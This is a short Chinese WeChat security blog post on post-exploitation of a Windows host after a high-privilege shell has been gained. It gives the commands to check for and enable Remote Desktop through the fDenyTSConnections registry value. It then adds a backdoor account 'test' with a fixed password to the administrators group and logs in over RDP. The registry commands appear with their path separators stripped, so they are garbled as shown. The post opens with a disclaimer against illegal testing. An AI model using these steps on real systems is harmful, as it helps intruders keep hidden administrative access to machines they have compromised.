声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
前情提要
本次利用的前提是在已经渗透到目标系统,成功连接shell,并为windows系统且为高权限,未设置白名单只能本地连接。
内网渗透
查看当前用户权限,确认为高权限。
whoami
查看一下3389端口开放情况(下图的情况是3389端口已经开启了,没开启就没有回显。)
netstat -an | find "3389"
如果没有回显,可以使用如下命令开启3389端口。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
顺便我这里给出关闭端口命令
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
添加用户
net user test xiaochou /add # 添加账户密码
net localgroup administrators test /add # 给test账户添加为管理员权限
net user test # 查询是否成功添加test用户
这样使用账号:test,密码:xiaochou 登录远程桌面
原文始发于微信公众号(Devil安全):【内网渗透】Windows远程桌面利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论